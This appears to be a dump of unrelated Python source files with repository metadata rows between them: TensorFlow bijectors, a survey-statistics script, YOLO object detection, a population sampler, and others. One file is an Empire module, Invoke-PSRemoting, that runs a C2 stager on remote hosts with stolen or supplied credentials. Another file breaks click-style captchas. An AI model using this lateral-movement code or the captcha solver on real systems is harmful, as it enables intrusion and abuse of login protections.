raise ValueError("Jacobian cannot be computed with unknown event_ndims")
_, _, event_dims = self.shaper.get_dims(y)
log_one_minus_exp_neg = math_ops.log(-_expm1(-y))
x = y + log_one_minus_exp_neg
ildj = -math_ops.reduce_sum(
log_one_minus_exp_neg, reduction_indices=event_dims)
return x, ildj
def _forward_log_det_jacobian(self, x): # pylint: disable=unused-argument
if self.shaper is None:
raise ValueError("Jacobian cannot be computed with unknown event_ndims")
_, _, event_dims = self.shaper.get_dims(x)
return -math_ops.reduce_sum(
nn_ops.softplus(-x), reduction_indices=event_dims)
class SoftmaxCentered(Bijector):
"""Bijector which computes `Y = g(X) = exp([X 0]) / sum(exp([X 0]))`.
To implement [softmax](https://en.wikipedia.org/wiki/Softmax_function) as a
bijection, the forward transformation appends a value to the input and the
inverse removes this coordinate. The appended coordinate represents a pivot,
e.g., `softmax(x) = exp(x-c) / sum(exp(x-c))` where `c` is the implicit last
coordinate.
Because we append a coordinate, this bijector only supports `event_ndim in [0,
1]`, i.e., scalars and vectors.
Example Use:
```python
bijector.SoftmaxCentered(event_ndims=1).forward(tf.log([2, 3, 4]))
# Result: [0.2, 0.3, 0.4, 0.1]
# Extra result: 0.1
bijector.SoftmaxCentered(event_ndims=1).inverse([0.2, 0.3, 0.4, 0.1])
# Result: tf.log([2, 3, 4])
# Extra coordinate removed.
```
At first blush it may seem like the [Invariance of domain](
https://en.wikipedia.org/wiki/Invariance_of_domain) theorem implies this
implementation is not a bijection. However, the appended dimension
makes the (forward) image non-open and the theorem does not directly apply.
"""
def __init__(self,
event_ndims=0,
validate_args=False,
name="softmax_centered"):
self._graph_parents = []
self._name = name
with self._name_scope("init", values=[event_ndims]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
event_ndims = tensor_util.constant_value(event_ndims)
if event_ndims is None or event_ndims not in [0, 1]:
raise ValueError("`event_ndims` must be a TF constant which is 0 or 1")
self._static_event_ndims = event_ndims
super(SoftmaxCentered, self).__init__(
batch_ndims=0, # We'll regard all non-event dims as sample dims.
event_ndims=event_ndims,
validate_args=validate_args,
name=name)
def _get_forward_event_shape(self, input_shape):
if input_shape.ndims is None:
return input_shape
if input_shape.ndims != self._static_event_ndims:
raise ValueError("input_shape.dims = %d != %d" %
(input_shape.ndims, self._static_event_ndims))
if input_shape.ndims == 0:
return tensor_shape.TensorShape([2])
if input_shape.ndims == 1:
return tensor_shape.TensorShape(input_shape[0] + 1)
# Unreachable code:
raise ValueError("event_ndims = %d must be 0 or 1" % input_shape.ndims)
def _forward_event_shape(self, input_shape):
ndims = array_ops.shape(input_shape)
if self.validate_args:
# It is not possible for a negative shape so we need only check <= 1.
is_zero_or_one = check_ops.assert_equal(
ndims, 0 if self._static_event_ndims == 0 else 1,
message="event_ndims must be 0 or 1")
ndims = control_flow_ops.with_dependencies([is_zero_or_one], ndims)
if self._static_event_ndims == 0:
return ops.convert_to_tensor(
[2], dtype=dtypes.int32, name="output_shape")
return input_shape + 1
def _get_inverse_event_shape(self, output_shape):
if output_shape.ndims is None:
return output_shape
if output_shape.ndims != 1:
raise ValueError("output_shape.ndims = %d != 1" % output_shape.ndims)
if self._static_event_ndims == 0:
return tensor_shape.TensorShape([])
return tensor_shape.TensorShape(output_shape[0] - 1)
def _inverse_event_shape(self, output_shape):
ndims = array_ops.shape(output_shape)[0]
if self.validate_args:
# It is not possible for a negative shape so we need only check <= 1.
is_one = check_ops.assert_equal(
ndims, 1, message="event_ndims must be 1")
ndims = control_flow_ops.with_dependencies([is_one], ndims)
if self._static_event_ndims == 0:
return ops.convert_to_tensor([], dtype=dtypes.int32, name="output_shape")
return array_ops.expand_dims(output_shape[0] - 1, dim=0)
def _forward(self, x):
# Pad the last dim with a zeros vector. We need this because it lets us
# infer the scale in the inverse function.
y = array_ops.expand_dims(x, dim=-1) if self._static_event_ndims == 0 else x
ndims = (y.get_shape().ndims if y.get_shape().ndims is not None
else array_ops.rank(y))
y = array_ops.pad(y,
paddings=array_ops.concat_v2(
(array_ops.zeros(
(ndims - 1, 2), dtype=dtypes.int32), [[0, 1]]),
0))
# Set shape hints.
if x.get_shape().ndims is not None:
shape = x.get_shape().as_list()
if self._static_event_ndims == 0:
shape += [2]
elif shape[-1] is not None:
shape[-1] += 1
shape = tensor_shape.TensorShape(shape)
y.get_shape().assert_is_compatible_with(shape)
y.set_shape(shape)
# Since we only support event_ndims in [0, 1] and we do padding, we always
# reduce over the last dimension, i.e., dim=-1 (which is the default).
return nn_ops.softmax(y)
def _inverse(self, y):
# To derive the inverse mapping note that:
# y[i] = exp(x[i]) / normalization
# and
# y[end] = 1 / normalization.
# Thus:
# x[i] = log(exp(x[i])) - log(y[end]) - log(normalization)
# = log(exp(x[i])/normalization) - log(y[end])
# = log(y[i]) - log(y[end])
shape = (np.asarray(y.get_shape().as_list(), dtype=np.int32)
if y.get_shape().is_fully_defined()
else array_ops.shape(y, name="shape"))
ndims = y.get_shape().ndims or math_ops.rank(y, name="ndims")
# Do this first to make sure CSE catches that it'll happen again in
# _inverse_log_det_jacobian.
x = math_ops.log(y)
# We now extract the last coordinate of the rightmost dimension.
# Our trick is to slice from [0,0,...,shape[-1]-1] to shape[:-1]+[1].
begin = array_ops.one_hot(indices=ndims-1,
depth=ndims,
on_value=shape[-1]-np.array(1, dtype=shape.dtype),
dtype=shape.dtype)
size = array_ops.concat_v2(
(shape[:-1], np.asarray(
[1], dtype=shape.dtype)), 0)
log_normalization = -array_ops.strided_slice(x, begin, begin + size)
# Here we slice out all but the last coordinate; see above for idea.
begin = array_ops.zeros_like(shape)
size = array_ops.concat_v2((shape[:-1], [shape[-1] - 1]), 0)
x = array_ops.strided_slice(x, begin, begin + size)
x += log_normalization
if self._static_event_ndims == 0:
x = array_ops.squeeze(x, squeeze_dims=[ndims-1])
# Set shape hints.
if y.get_shape().ndims is not None:
shape = y.get_shape().as_list()
if self._static_event_ndims == 0:
shape = shape[:-1]
elif shape[-1] is not None:
shape[-1] -= 1
shape = tensor_shape.TensorShape(shape)
x.get_shape().assert_is_compatible_with(shape)
x.set_shape(shape)
return x
def _inverse_log_det_jacobian(self, y):
# WLOG, consider the vector case:
# x = log(y[:-1]) - log(y[-1])
# where,
# y[-1] = 1 - sum(y[:-1]).
# We have:
# det{ dX/dY } = det{ diag(1 ./ y[:-1]) + 1 / y[-1] }
# = det{ inv{ diag(y[:-1]) - y[:-1]' y[:-1] } } (1)
# = 1 / det{ diag(y[:-1]) - y[:-1]' y[:-1] }
# = 1 / { (1 + y[:-1]' inv(diag(y[:-1])) y[:-1]) *
# det(diag(y[:-1])) } (2)
# = 1 / { y[-1] prod(y[:-1]) }
# = 1 / prod(y)
# (1) - https://en.wikipedia.org/wiki/Sherman%E2%80%93Morrison_formula
# or by noting that det{ dX/dY } = 1 / det{ dY/dX } from Bijector
# docstring "Tip".
# (2) - https://en.wikipedia.org/wiki/Matrix_determinant_lemma
return -math_ops.reduce_sum(math_ops.log(y), reduction_indices=-1)
def _forward_log_det_jacobian(self, x):
if self._static_event_ndims == 0:
return x - 2. * nn_ops.softplus(x)
else:
# This code is similar to nn_ops.log_softmax but different because we have
# an implicit zero column to handle. I.e., instead of:
# reduce_sum(logits - reduce_sum(exp(logits), dim))
# we must do:
# log_normalization = 1 + reduce_sum(exp(logits))
# -log_normalization + reduce_sum(logits - log_normalization)
log_normalization = nn_ops.softplus(
math_ops.reduce_logsumexp(x, reduction_indices=-1, keep_dims=True))
fldj = (-log_normalization +
math_ops.reduce_sum(x - log_normalization,
reduction_indices=-1,
keep_dims=True))
return array_ops.squeeze(fldj, squeeze_dims=-1)
class SigmoidCentered(SoftmaxCentered):
"""Bijector which computes Y = g(X) = exp([X 0]) / (1 + exp(-X)).
Equivalent to: `bijector.SoftmaxCentered(event_ndims=0)`.
See `bijector.SoftmaxCentered` for more details.
"""
def __init__(self, validate_args=False, name="sigmoid_centered"):
super(SigmoidCentered, self).__init__(
validate_args=validate_args, name=name)
class CholeskyOuterProduct(Bijector):
# pylint: disable=line-too-long
"""Bijector which computes Y = g(X) = X X.T where X is a lower-triangular, positive-diagonal matrix.
`event_ndims` must be 0 or 2, i.e., scalar or matrix.
Note: the upper-triangular part of X is ignored (whether or not its zero).
Examples:
```python
bijector.CholeskyOuterProduct(event_ndims=2).forward(x=[[1., 0], [2, 1]])
# Result: [[1, 1], [1, 5]], i.e., x x.T
bijector.SoftmaxCentered(event_ndims=2).inverse(y=[[1., 1], [1, 5]])
# Result: [[1, 0], [2, 1]], i.e., chol(y).
```
"""
# pylint: enable=line-too-long
def __init__(self, event_ndims=2, validate_args=False,
name="cholesky_outer_product"):
"""Instantiates the `CholeskyOuterProduct` bijector.
Args:
event_ndims: `constant` `int32` scalar `Tensor` indicating the number of
dimensions associated with a particular draw from the distribution. Must
be 0 or 2.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
Raises:
ValueError: if event_ndims is neither 0 or 2.
"""
self._graph_parents = []
self._name = name
with self._name_scope("init", values=[event_ndims]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
event_ndims = tensor_util.constant_value(event_ndims)
if event_ndims is None or event_ndims not in [0, 2]:
raise ValueError("`event_ndims` must be a TF constant which is 0 or 2")
self._static_event_ndims = event_ndims
super(CholeskyOuterProduct, self).__init__(
validate_args=validate_args,
name=name)
def _forward(self, x):
if self._static_event_ndims == 0:
return math_ops.square(x)
if self.validate_args:
is_matrix = check_ops.assert_rank_at_least(x, 2)
shape = array_ops.shape(x)
is_square = check_ops.assert_equal(shape[-2], shape[-1])
x = control_flow_ops.with_dependencies([is_matrix, is_square], x)
# For safety, explicitly zero-out the upper triangular part.
x = array_ops.matrix_band_part(x, -1, 0)
return math_ops.matmul(x, x, adjoint_b=True)
def _inverse_and_inverse_log_det_jacobian(self, y):
x = (math_ops.sqrt(y) if self._static_event_ndims == 0
else linalg_ops.cholesky(y))
return x, -self._forward_log_det_jacobian(x)
def _forward_log_det_jacobian(self, x):
# Let Y be a symmetric, positive definite matrix and write:
# Y = X X.T
# where X is lower-triangular.
#
# Observe that,
# dY[i,j]/dX[a,b]
# = d/dX[a,b] { X[i,:] X[j,:] }
# = sum_{d=1}^p { I[i=a] I[d=b] X[j,d] + I[j=a] I[d=b] X[i,d] }
#
# To compute the Jacobian dX/dY we must represent X,Y as vectors. Since Y is
# symmetric and X is lower-triangular, we need vectors of dimension:
# d = p (p + 1) / 2
# where X, Y are p x p matrices, p > 0. We use a row-major mapping, i.e.,
# k = { i (i + 1) / 2 + j i>=j
# { undef i<j
# and assume zero-based indexes. When k is undef, the element is dropped.
# Example:
# j k
# 0 1 2 3 /
# 0 [ 0 . . . ]
# i 1 [ 1 2 . . ]
# 2 [ 3 4 5 . ]
# 3 [ 6 7 8 9 ]
# Write vec[.] to indicate transforming a matrix to vector via k(i,j). (With
# slight abuse: k(i,j)=undef means the element is dropped.)
#
# We now show d vec[Y] / d vec[X] is lower triangular. Assuming both are
# defined, observe that k(i,j) < k(a,b) iff (1) i<a or (2) i=a and j<b.
# In both cases dvec[Y]/dvec[X]@[k(i,j),k(a,b)] = 0 since:
# (1) j<=i<a thus i,j!=a.
# (2) i=a>j thus i,j!=a.
#
# Since the Jacobian is lower-triangular, we need only compute the product
# of diagonal elements:
# d vec[Y] / d vec[X] @[k(i,j), k(i,j)]
# = X[j,j] + I[i=j] X[i,j]
# = 2 X[j,j].
# Since there is a 2 X[j,j] term for every lower-triangular element of X we
# conclude:
# |Jac(d vec[Y]/d vec[X])| = 2^p prod_{j=0}^{p-1} X[j,j]^{p-j}.
if self._static_event_ndims == 0:
if self.validate_args:
is_positive = check_ops.assert_positive(
x, message="All elements must be positive.")
x = control_flow_ops.with_dependencies([is_positive], x)
return math.log(2.) + math_ops.log(x)
diag = array_ops.matrix_diag_part(x)
if self.validate_args:
is_matrix = check_ops.assert_rank_at_least(
x, 2, message="Input must be a (batch of) matrix.")
shape = array_ops.shape(x)
is_square = check_ops.assert_equal(
shape[-2], shape[-1],
message="Input must be a (batch of) square matrix.")
# Assuming lower-triangular means we only need check diag>0.
is_positive_definite = check_ops.assert_positive(
diag, message="Input must be positive definite.")
x = control_flow_ops.with_dependencies(
[is_matrix, is_square, is_positive_definite], x)
# Create a column vector equal to: [p, p-1, ..., 2, 1].T.
if x.get_shape().ndims is None or x.get_shape()[-1].value is None:
p = array_ops.shape(x)[-1]
else:
p = x.get_shape()[-1].value
exponents = array_ops.expand_dims(
math_ops.linspace(math_ops.cast(p, dtype=x.dtype), 1., p),
dim=1)
sum_weighted_log_diag = array_ops.squeeze(
math_ops.matmul(math_ops.log(diag), exponents), squeeze_dims=-1)
fldj = p * math.log(2.) + sum_weighted_log_diag
if x.get_shape().ndims is not None:
fldj.set_shape(x.get_shape()[:-2])
return fldj
| [
"[email protected]"
] | |
3b804e792b3544778740271e6b7778c33013a07a | 8b0fc85f784618b81a63a038d65cad2354e674ac | /cmo_hr_expense_report/models/__init__.py | 4a84a60ed89128ff60182e89b87d001de8b6a8ec | [] | no_license | ecosoft-odoo/cmo_specific | 2e284fc0be2cf2de7986cbfe9fe233ef2c964d41 | 12cc42d9555b3b587f148cb36bac8e7e3f7c1593 | refs/heads/master | 2021-09-18T03:33:35.342095 | 2021-04-12T04:25:28 | 2021-04-12T04:25:28 | 113,545,569 | 3 | 12 | null | 2022-01-20T11:47:52 | 2017-12-08T07:31:34 | Python | UTF-8 | Python | false | false | 42 | py | # -*- coding: utf-8 -*-
from . import hr
| [
"[email protected]"
] | |
219cef7e0bdb3c19ef844fd2b9f31656dcc58f07 | 2817ecd7e48c4decba12ee76e451727c1a6acf14 | /scripts/legacy/survey_distribution.py | 645981e58fef1bc3a1c76cafe786360c095677dc | [] | no_license | schwa-lab/sharingnews | 6fcef71c16a03fb3a4a56c11322ba5c8ceb59582 | 81c87176c7b37511f15a97189f03d90d5074d0fb | refs/heads/master | 2021-01-16T21:46:23.108811 | 2018-02-12T06:33:30 | 2018-02-12T06:33:30 | 26,195,626 | 3 | 0 | null | 2018-02-12T06:33:16 | 2014-11-05T00:39:40 | Python | UTF-8 | Python | false | false | 3,985 | py | from __future__ import print_function, division
from collections import Counter, defaultdict
import operator
from likeable.cleaning import strip_subdomains
MONTH_FIELD = 1
def get_status_binary(l):
status = l[8]
if status == '200':
return True
else:
return False
def get_status_group(l):
status = l[8]
if status.startswith('<') or status == '-':
return 'ERR'
elif status == '200?':
return 'HOME'
else:
return status[0] + 'xx'
def _norm_date(dt, n_months):
if n_months is None:
return
return (dt[:4] + '-' +
'%02d' % ((int(dt[5:7]) - 1) // n_months * n_months + 1))
def get_distribs(key_field, get_cat, n_months, weight=None):
# Group survey by status (cat), sig (key) and date group
distrs = defaultdict(Counter)
for l in open('data/sample-survey-v2'):
l = l.rstrip('\r\n').split('\t')
dt = _norm_date(l[MONTH_FIELD], n_months)
distrs[l[key_field], dt][get_cat(l)] += 1
if weight is None:
get_weight = lambda k: 1
else:
get_weight = weight.get
for k in distrs:
distr = distrs[k]
w = get_weight(k) or 0 # HACK due to dirty data?
total = sum(distr.values())
distrs[k] = {c: w * n / total
for c, n in distr.items()}
return distrs
def get_sig_weights(n_months):
# Get overall frequency for each key and date
sig_weight = defaultdict(int)
for l in open('data/url-sig-frequencies.txt'):
l = l.rstrip('\r\n').split('\t')
try:
sig_weight[l[2], _norm_date(l[1], n_months)] += int(l[0])
except (IndexError, ValueError):
# Dirty data
pass
sig_weight.default_factory = None
return sig_weight
def _sig_to_domain(sig):
return strip_subdomains(sig.split('/')[0])
def regroup_by_domain(distrs):
out = defaultdict(lambda: defaultdict(float))
for (k, m), distr in distrs.iteritems():
for c, n in distr.iteritems():
out[_sig_to_domain(k), m][c] += n
return out
def get_all_cats(distrs):
cats = set()
for distr in distrs.itervalues():
for c in distr:
cats.add(c)
return sorted(cats)
if __name__ == '__main__':
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('-m', '--month-quant', type=int,
help='Group this many months together (default, all time)')
ap.add_argument('--by-sig', default=False, action='store_true')
ap.add_argument('--use-end-sig', default=False, action='store_true',
help='Calculates status on the basis of likely canonical '
'URL signature')
cat_opts = {
'status-binary': get_status_binary,
'status-group': get_status_group,
}
ap.add_argument('-c', '--cats', choices=cat_opts.keys(),
default='status-binary')
args = ap.parse_args()
n_months = getattr(args, 'month_quant', None)
if n_months is not None and 12 % n_months != 0:
ap.error('--month-quant (-m) must divide into 12')
sig_weight = get_sig_weights(n_months)
key_field = 4 # start sig
if args.use_end_sig:
tmp = get_distribs(key_field, operator.itemgetter(7), n_months,
weight=sig_weight)
sig_weight = defaultdict(float)
for (start_sig, mo), distr in tmp.iteritems():
for end_sig, n in distr.iteritems():
sig_weight[end_sig, mo] += n
key_field = 7 # end sig
distrs = get_distribs(key_field, cat_opts[args.cats], n_months,
weight=sig_weight)
if not args.by_sig:
distrs = regroup_by_domain(distrs)
# output
all_cats = get_all_cats(distrs)
print('key', 'month', *all_cats, sep='\t')
for k, v in sorted(distrs.iteritems()):
k = list(k)
k.extend(v.get(c, 0) for c in all_cats)
print(*k, sep='\t')
| [
"[email protected]"
] | |
495ba133d20be9696a894db3f3accc2f2fd82015 | 326c6ad82d59bb7509c02c76695ea9035993da70 | /lib/modules/powershell/lateral_movement/invoke_psremoting.py | 4680387727765b745328f6c6d9f005817ee6c58e | [
"BSD-3-Clause"
] | permissive | Arvanaghi/Empire | 0c08bd7ddfba9be10e96bb0834b8ce3bc829059b | fd168ebf8acb1c2ee59d56f2c393ebd7a297603e | refs/heads/master | 2021-01-20T14:15:34.864581 | 2017-08-05T17:51:44 | 2017-08-05T17:51:44 | 99,435,848 | 2 | 0 | null | 2017-08-05T16:50:16 | 2017-08-05T16:50:16 | null | UTF-8 | Python | false | false | 5,441 | py | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-PSRemoting',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using PSRemoting.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'CredID' : {
'Description' : 'CredID from the store to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : '[domain\]username to use to execute command.',
'Required' : False,
'Value' : ''
},
'Password' : {
'Description' : 'Password to use to execute command.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
userName = self.options['UserName']['Value']
password = self.options['Password']['Value']
script = """Invoke-Command """
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
self.options["Password"]['Value'] = password
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
return ""
else:
# build the PSRemoting execution string
computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
script += " -ComputerName @("+computerNames+")"
script += " -ScriptBlock {" + launcher + "}"
if self.options["UserName"]['Value'] != "" and self.options["Password"]['Value'] != "":
# add in the user credentials
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-PSRemoting executed on " +computerNames +"'"
return script
| [
"[email protected]"
] | |
ac49ac9a742dde207c205fdf63ceaf884a3a20e3 | 70ed9ef2867b2c0ca96596f8fdd75c31af5ac116 | /build/lib/ArticleSpider/zheye/__init__.py | 83954ea69947cd42adcc0f1dd46ef9f117c78f71 | [] | no_license | nanmuyao/ArticleSpider | b24aef4bbd761951dd1bd450e49de8f40c96f289 | a75cfaa028b1717636866b5833cdcaa29a2ec43a | refs/heads/master | 2021-07-24T16:16:20.597430 | 2017-11-05T08:01:53 | 2017-11-05T08:01:53 | 109,280,103 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Recognizing class
from sklearn.mixture import GaussianMixture
from PIL import Image
from ArticleSpider.zheye import util
import numpy as np
class zheye:
def __init__(self):
''' load model '''
import os
import keras
full_path = os.path.realpath(__file__)
path, filename = os.path.split(full_path)
self.model = keras.models.load_model(path +'/zheyeV3.keras')
def Recognize(self, fn):
im = Image.open(fn)
im = util.CenterExtend(im, radius=20)
vec = np.asarray(im.convert('L')).copy()
Y = []
for i in range(vec.shape[0]):
for j in range(vec.shape[1]):
if vec[i][j] <= 200:
Y.append([i, j])
gmm = GaussianMixture(n_components=7, covariance_type='tied', reg_covar=1e2, tol=1e3, n_init=9)
gmm.fit(Y)
centers = gmm.means_
points = []
for i in range(7):
scoring = 0.0
for w_i in range(3):
for w_j in range(3):
p_x = centers[i][0] -1 +w_i
p_y = centers[i][1] -1 +w_j
cr = util.crop(im, p_x, p_y, radius=20)
cr = cr.resize((40, 40), Image.ANTIALIAS)
X = np.asarray(cr.convert('L'), dtype='float')
X = (X.astype("float") - 180) /200
x0 = np.expand_dims(X, axis=0)
x1 = np.expand_dims(x0, axis=3)
global model
if self.model.predict(x1)[0][0] < 0.5:
scoring += 1
if scoring > 4:
points.append((centers[i][0] -20, centers[i][1] -20))
return points | [
"[email protected]"
] | |
0db2aa9ff306478ee3e5479f7c42bd343136846d | 795f0081004920c15c178c43b00432cb8e7ca586 | /controller/src/object_detection.py | 3d2d3f1083a94ede6cb0ff9622c6d4a24be2a5ba | [] | no_license | 60alex60/ECE140aLab6 | e6e9985a07e5615a5678d817cdfb031802322425 | f966af1d7aa87ab9f602bd3ad3f4cdea13ee7421 | refs/heads/master | 2023-04-05T15:31:52.014565 | 2021-03-05T05:41:31 | 2021-03-05T05:41:31 | 353,224,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,292 | py | import numpy as np
import cv2
import time
class ImgProc():
def __init__(self):
# read pre-trained model and config file
self.net = cv2.dnn.readNet("object_detection/yolov4-tiny.weights", "object_detection/yolov4-tiny.cfg")
# read class names from text file
self.classes = None
with open("object_detection/coco.names", 'r') as f:
self.classes = [line.strip() for line in f.readlines()]
# generate different colors for different classes
self.COLORS = np.random.uniform(0, 255, size=(len(self.classes), 3))
# function to get the output layer names
# in the architecture
def get_output_layers(self, net):
layer_names = net.getLayerNames()
output_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
return output_layers
# function to draw bounding box on the detected object with class name
def draw_bounding_box(self, img, class_id, confidence, x, y, x_plus_w, y_plus_h):
label = str(self.classes[class_id])
color = self.COLORS[class_id]
cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)
cv2.putText(img, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
def detect_objects(self, img):
W = img.shape[1]
H = img.shape[0]
# create input blob
sz = (416, 416) # (224,224)
normalization = 1.0 / 255.0
blob = cv2.dnn.blobFromImage(img, normalization, sz, (0, 0, 0), True, crop=False)
# set input blob for the network
self.net.setInput(blob)
# run inference through the network
# and gather predictions from output layers
outs = self.net.forward(self.get_output_layers(self.net))
# initialization
class_ids = []
confidences = []
boxes = []
centroids = []
conf_threshold = 0.3
nms_threshold = 0.1
# For each detetion from each output layer get the confidence, class id, bounding box params and ignore weak detections (confidence < 0.5)
for out in outs:
for detection in out:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > conf_threshold:
center_x = int(detection[0] * W)
center_y = int(detection[1] * H)
w = int(detection[2] * W)
h = int(detection[3] * H)
x = center_x - w / 2
y = center_y - h / 2
class_ids.append(class_id)
confidences.append(float(confidence))
boxes.append([x, y, w, h])
centroids.append((center_x, center_y))
# Apply non-max suppression to prevent duplicate detections
indices = cv2.dnn.NMSBoxes(boxes, confidences, conf_threshold, nms_threshold)
# Go through the detections remaining after NMS and draw bounding boxes
detections = []
frame = img.copy()
for i in indices:
i = i[0]
box = boxes[i]
x = box[0]
y = box[1]
w = box[2]
h = box[3]
self.draw_bounding_box(frame, class_ids[i], confidences[i], round(x), round(y), round(x + w), round(y + h))
detections.append((self.classes[class_ids[i]], centroids[i], box))
print("Detected Objects: ", detections)
return detections, frame
if __name__ == "__main__":
img = cv2.imread('sample_img.png')
imgProc = ImgProc()
imgProc.detect_objects(img)
| [
"66690702+github-classroom[bot]@users.noreply.github.com"
] | 66690702+github-classroom[bot]@users.noreply.github.com |
bfabb2739c171793041ee29b0c6b4b331220b17b | d60e74dae2c4bcef6bc7c8faea51dc6b245de42f | /package/inference/mc/population.py | 3e105cf0362f917f410e330bcc5f023dc5518596 | [] | no_license | tloredo/inference | 37664ef62317f32ad5ab25c56ead1c49bfc91045 | 215de4e93b5cf79a1e9f380047b4db92bfeaf45c | refs/heads/master | 2021-09-09T06:24:16.690338 | 2021-09-01T21:03:52 | 2021-09-01T21:03:52 | 142,254,094 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,441 | py | """
Classes and functions for describing and sampling discrete populations.
"""
# TODO: Distinguish sizes from weights (normalized).
__author__ = "Tom Loredo"
from numpy import array, random
from _ppssampler import _ppssampler, equalprob
from _ppssampler import set_rng_state, get_rng_state
from inference.utils.pl import pl
# try:
# import pylab as pl
# except ImportError:
# pl = None
__all__ = ['Population', 'Population1D']
class Population(object):
def __init__(self, items=None, weights=None):
if weights is None: # The equal probability case
self.equiprob = True
try: # items is a sequence
self.npopn = len(items)
self.items = items
except TypeError: # items is an int
self.npopn = int(items)
self.items = list(range(self.npopn))
elif items is None: # Use indices as items
self.equiprob = False
self.npopn = len(weights)
self.items = list(range(self.npopn))
self.weights = array(weights, float)
else: # Use a list of items *and* weights
self.equiprob = False
self.npopn = len(weights)
if len(items) != self.npopn:
raise ValueError('Lengths of items & weights must match!')
self.items = items
self.weights = array(weights, float)
self.did_init = False
self.did_Sampford_init = False
self.did_Sampford_tables = False
def sample(self, nsamp):
"""
Return a set of nsamp samples from the population, sampled with
replacement.
"""
# *** Implement equiprob case.
if self.equiprob:
raise NotImplementedError('Awaiting code...')
if not self.did_init:
self.sampler = _ppssampler(self.weights)
self.did_init = True
# Track the RNG state within the sampler, to update NumPy's RNG state.
# Internally we only use the MT state; any extra state for cached
# normal or other samples can just be copied.
rng_state = random.get_state()
mt_state, extra_state = rng_state[:3], rng_state[3:]
set_rng_state(*mt_state) # *** modify to handle full rng state
indices = self.sampler.sample(nsamp)
new_state = list(get_rng_state())
new_state.extend(extra_state)
random.set_state(new_state)
return [self.items[i] for i in indices]
def max_subset(self):
"""
Return the maximum sample size for PPS sampling without replacement.
The limiting size arises because PPS sampling without replacement
requires nsamp*(max normalized weight) <= 1. If this is violated
for the desired sample size, you may consider trimming the large
weight members from the population and including them in every
sample (of course, they will all have inclusion probability of
unity, regardless of size).
"""
if self.did_Sampford_init:
return int(1./self.max_wt)
else:
return int(sum(self.weights)/self.weights.max())
def subset_pps(self, nsamp):
"""
Return a sample of nsamp distinct items from the population, sampled
without replacement with probability proportional to size (PPS)
according to Sampford's sampling scheme.
"""
# Copy the whole population if nsamp = npopn.
if nsamp == self.npopn:
return [item for item in self.items]
set_rng_state(*random.get_state())
if self.equiprob:
pool = arange(self.npopn)
indices = equalprob(nsamp, pool)
else:
# This part of setup has to be done before any sampling.
if not self.did_init:
print('Initing ppssampler...')
self.sampler = _ppssampler(self.weights)
self.did_init = True
# This part has to be done before any sampling w/o replacement.
if not self.did_Sampford_init:
print('Initing wts...')
self.sort_indices, self.sort_wts, self.tot_wt = \
self.sampler.prepwts(self.weights)
self.max_wt = self.sort_wts[0]/self.tot_wt # Max wt, normed
self.nsamp = 0
self.did_Sampford_init = True
self.did_Sampford_tables = False
# This part has to be done when sample size changes.
if self.nsamp != nsamp:
print('Initing ratios...')
if nsamp > self.npopn:
raise ValueError('nsamp larger than population size!')
if nsamp*self.max_wt > 1:
raise ValueError('Sample size too large for PPS sampling!')
self.sampler.prepratios(nsamp, self.sort_wts, self.tot_wt)
self.did_Sampford_tables = False
self.nsamp = nsamp
self.ntry, sindices = self.sampler.samplenr()
indices = [self.sort_indices[i] for i in sindices]
result = [self.items[i] for i in indices]
random.set_state(get_rng_state())
return result
